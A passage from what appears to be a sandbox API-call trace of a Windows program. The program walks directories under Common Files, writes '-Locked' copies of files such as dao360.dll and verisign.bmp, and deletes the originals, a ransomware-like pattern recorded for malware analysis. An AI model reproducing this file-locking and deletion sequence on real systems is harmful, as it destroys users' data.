(x86)\\Common Files\\Microsoft Shared\\*", lpFindFileData=0x1aee8c | out: lpFindFileData=0x1aee8c*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x5557162e, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5557162e, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0299.550] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x5557162e, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5557162e, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0299.550] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x32df615, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x32df615, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DAO", cAlternateFileName="")) returned 1 [0299.551] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6ec61aae, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6ec61aae, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Ink", cAlternateFileName="")) returned 1 [0299.551] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x550eae0c, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x550eae0c, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x550eae0c, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSEnv", cAlternateFileName="")) returned 1 [0299.551] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSInfo", cAlternateFileName="")) returned 1 [0299.552] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f6d7c91, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x6f8d7365, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x6f8d7365, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="OFFICE16", cAlternateFileName="")) returned 1 [0299.552] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f65c7f6, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x6f65c7f6, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x6f65c7f6, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="OfficeSoftwareProtectionPlatform", cAlternateFileName="OFFICE~1")) returned 1 [0299.552] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5557162e, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x5557162e, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5557162e, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Source Engine", cAlternateFileName="SOURCE~1")) returned 1 [0299.553] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x332baca, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x332baca, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Stationery", cAlternateFileName="STATIO~1")) returned 1 [0299.553] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TextConv", cAlternateFileName="")) returned 1 [0299.553] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Triedit", cAlternateFileName="")) returned 1 [0299.553] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0x6e37d73, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x8cfdaf35, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x8cfdaf35, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VC", cAlternateFileName="")) returned 1 [0299.553] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x332baca, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x332baca, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VGX", cAlternateFileName="")) returned 1 [0299.554] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x550c4c74, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x5567f2c8, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5567f2c8, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VSTA", cAlternateFileName="")) returned 1 [0299.554] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5509eb42, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x55677c77, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x55677c77, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VSTO", cAlternateFileName="")) returned 1 [0299.554] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0299.554] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0299.555] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af124) returned 1 [0299.555] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af130) returned 1 [0299.555] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af11c) returned 1 [0299.555] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\DAO", nBufferLength=0x105, lpBuffer=0x1aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\DAO", lpFilePart=0x0) returned 0x38 [0299.555] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\DAO\\", nBufferLength=0x105, lpBuffer=0x1aebf8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\DAO\\", lpFilePart=0x0) returned 0x39 [0299.555] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\DAO\\*", lpFindFileData=0x1aee44 | out: lpFindFileData=0x1aee44*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x32df615, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x32df615, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0299.556] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x32df615, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x32df615, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0299.556] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ce92be3, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2ce92be3, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2ce92be3, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x95000, dwReserved0=0x0, dwReserved1=0x0, cFileName="dao360.dll", cAlternateFileName="")) returned 1 [0299.556] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0299.556] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0299.557] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0dc) returned 1 [0299.557] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0e8) returned 1 [0299.557] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af11c) returned 1 [0299.557] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\DAO", nBufferLength=0x105, lpBuffer=0x1aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\DAO", lpFilePart=0x0) returned 0x38 [0299.558] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\DAO\\", nBufferLength=0x105, lpBuffer=0x1aebf8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\DAO\\", lpFilePart=0x0) returned 0x39 [0299.558] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\DAO\\*", lpFindFileData=0x1aee44 | out: lpFindFileData=0x1aee44*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x32df615, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x32df615, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0299.558] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x32df615, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x32df615, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0299.559] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ce92be3, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2ce92be3, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2ce92be3, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x95000, dwReserved0=0x0, dwReserved1=0x0, cFileName="dao360.dll", cAlternateFileName="")) returned 1 [0299.559] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ce92be3, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2ce92be3, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2ce92be3, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x95000, dwReserved0=0x0, dwReserved1=0x0, cFileName="dao360.dll", cAlternateFileName="")) returned 0 [0299.559] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0299.559] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0dc) returned 1 [0299.559] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0e8) returned 1 [0299.560] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\DAO\\dao360.dll-Locked", nBufferLength=0x105, lpBuffer=0x1aead4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\DAO\\dao360.dll-Locked", lpFilePart=0x0) returned 0x4a [0299.560] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1aefc8) returned 1 [0299.560] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\DAO\\dao360.dll-Locked" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\dao\\dao360.dll-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0299.561] GetFileType (hFile=0x49c) returned 0x1 [0299.561] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1aefc4) returned 1 [0299.561] GetFileType (hFile=0x49c) returned 0x1 [0299.563] CloseHandle (hObject=0x49c) returned 1 [0299.564] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\DAO\\dao360.dll", nBufferLength=0x105, lpBuffer=0x1aec54, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\DAO\\dao360.dll", lpFilePart=0x0) returned 0x43 [0299.564] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\DAO\\dao360.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\dao\\dao360.dll")) returned 0 [0299.569] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\DAO", nBufferLength=0x105, lpBuffer=0x1aeca8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\DAO", lpFilePart=0x0) returned 0x38 [0299.569] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0f4) returned 1 [0299.569] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\DAO" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\dao"), fInfoLevelId=0x0, lpFileInformation=0x1af174 | out: lpFileInformation=0x1af174*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x32f2dd29, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32f2dd29, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0299.570] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0f0) returned 1 [0299.570] RemoveDirectoryW (lpPathName="C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\DAO" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\dao")) returned 0 [0299.571] CoTaskMemAlloc (cb=0x404) returned 0x73f0b8 [0299.571] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x91, dwLanguageId=0x0, lpBuffer=0x73f0b8, nSize=0x200, Arguments=0x0 | out: lpBuffer="The directory is not empty.\r\n") returned 0x1d [0299.571] CoTaskMemFree (pv=0x73f0b8) [0299.573] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Services\\.", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Services", lpFilePart=0x0) returned 0x2c [0299.573] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af164) returned 1 [0299.574] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Services", nBufferLength=0x105, lpBuffer=0x1aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Services", lpFilePart=0x0) returned 0x2c [0299.574] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Services\\", nBufferLength=0x105, lpBuffer=0x1aec40, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Services\\", lpFilePart=0x0) returned 0x2d [0299.574] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Services\\*", lpFindFileData=0x1aee8c | out: lpFindFileData=0x1aee8c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x332baca, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x332baca, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0299.576] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x332baca, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x332baca, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0299.576] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2d0cef24, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2d0cef24, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2d0cef24, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xa8e, dwReserved0=0x0, dwReserved1=0x0, cFileName="verisign.bmp", cAlternateFileName="")) returned 1 [0299.576] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0299.577] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0299.577] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af124) returned 1 [0299.577] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af130) returned 1 [0299.577] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af164) returned 1 [0299.577] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Services", nBufferLength=0x105, lpBuffer=0x1aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Services", lpFilePart=0x0) returned 0x2c [0299.577] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Services\\", nBufferLength=0x105, lpBuffer=0x1aec40, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Services\\", lpFilePart=0x0) returned 0x2d [0299.577] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Services\\*", lpFindFileData=0x1aee8c | out: lpFindFileData=0x1aee8c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x332baca, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x332baca, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0299.578] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x332baca, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x332baca, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0299.578] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2d0cef24, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2d0cef24, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2d0cef24, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xa8e, dwReserved0=0x0, dwReserved1=0x0, cFileName="verisign.bmp", cAlternateFileName="")) returned 1 [0299.578] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2d0cef24, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2d0cef24, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2d0cef24, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xa8e, dwReserved0=0x0, dwReserved1=0x0, cFileName="verisign.bmp", cAlternateFileName="")) returned 0 [0299.578] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0299.579] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af124) returned 1 [0299.579] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af130) returned 1 [0299.579] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Services\\verisign.bmp-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Services\\verisign.bmp-Locked", lpFilePart=0x0) returned 0x40 [0299.579] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0299.579] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\Services\\verisign.bmp-Locked" (normalized: "c:\\program files (x86)\\common files\\services\\verisign.bmp-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0299.579] GetFileType (hFile=0x49c) returned 0x1 [0299.579] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0299.579] GetFileType (hFile=0x49c) returned 0x1 [0299.582] CloseHandle (hObject=0x49c) returned 1 [0299.583] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Services\\verisign.bmp", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Services\\verisign.bmp", lpFilePart=0x0) returned 0x39 [0299.583] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\Services\\verisign.bmp" (normalized: "c:\\program files (x86)\\common files\\services\\verisign.bmp")) returned 1 [0299.586] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\System\\.", nBufferLength=0x105, 